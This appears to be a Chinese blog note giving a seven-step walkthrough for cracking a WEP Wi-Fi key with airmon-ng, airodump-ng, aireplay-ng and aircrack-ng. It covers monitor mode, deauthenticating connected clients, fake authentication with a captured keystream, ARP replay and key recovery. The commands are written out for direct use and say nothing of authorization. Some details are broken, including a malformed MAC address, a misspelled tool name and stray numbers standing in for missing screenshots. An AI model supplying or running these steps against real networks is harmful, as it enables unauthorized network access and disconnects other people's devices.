WEP密碼分析流程-筆記

第一步:進入Monitor 模式

airmon-ng   #查看當前使用無線網卡

airmon-ng check #查看可能影響無線掃描的進程

airmon-ng check kill #關閉有可能影響無線掃描的進程

airmon-ng start wlan0 #使用wlan0 進入Monitor模式

使用 iwconfig 命令 查看 wlanmon的 Mode項是否切換爲Monitor模式

第二步:啓動抓包並保存數據包

airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w wep.cap #--bssid 監聽指定MAC的設備 -c 是指定信道 -w 把監聽的數據包寫入文件
 

第三步:Deauthentication 抓取XOR文件(有無線設備已經連接上路由器)

發送解除數據包打斷現在與AP(路由器)連接的設備(手機,筆記本等),讓設備再次重新連接

aireplay-ng -0 1 -a EC:26:CADC:29:B6 -c 08:57:00:0C:96:68 wlan0mon# -0打斷指令  1 進行一次嘗試 -a 路由器的mac  -c要斷開的無線設備MAC地址 wlan0mon 使用的無線網卡

11

出現 keystream說明成功獲取XOR文件:

2

第四步:利用XOR文件與AP建立關聯

airreplay-ng -1 60 -e  TP_LINK7301 -y wep-01-80-89-17-1E-2B-44.xor  -a 00:11:22:33:44:55  -h 66:77:55:33:22:11 wlan0mon #-1 多長時間進行重新關聯 -e指定關聯的AP -y 關聯密鑰流文件(ls指令即可查看抓到的文件) -a 重放STA地址(連上該路由的MAC地址)  -h自己無線網卡的MAC地址 wlan0mon使用的當前無線網卡

6

第五步:執行ARP重放

aireplay-ng -3 -b EC:26:CADC:29:B6 -h 66:77:55:33:22:11  wlan0mon#-3 arp重放攻擊 -b 指定要攻擊的AP地址 -h 自己無線網卡的MAC地址 wlan0mon使用的當前無線網卡

55

第六步:Deauthentication觸發ARP數據包(新的窗口輸入打斷指令)

aireplay-ng -0 1 -a EC:26:CADC:29:B6 -c 08:57:00:0C:96:68 wlan0mon# -0打斷指令  1 進行一次嘗試 -a 路由器的mac  -c要斷開的無線設備MAC地址 wlan0mon 使用的無線網卡

打斷重連後,就會抓取到ARP包

66

第七步:收集足夠多的DATA之後出現密碼(可以新開窗口進行邊抓包邊分析)

aircrack-ng wep-01.cap   #對抓包的文件進行分析

最後得到的密碼:

77

 

 

發佈了38 篇原創文章 · 獲贊 10 · 訪問量 9萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章